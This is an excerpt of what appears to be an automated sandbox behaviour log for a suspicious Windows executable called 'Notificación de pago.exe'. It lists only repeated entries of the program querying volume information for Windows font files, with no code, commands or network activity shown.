          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
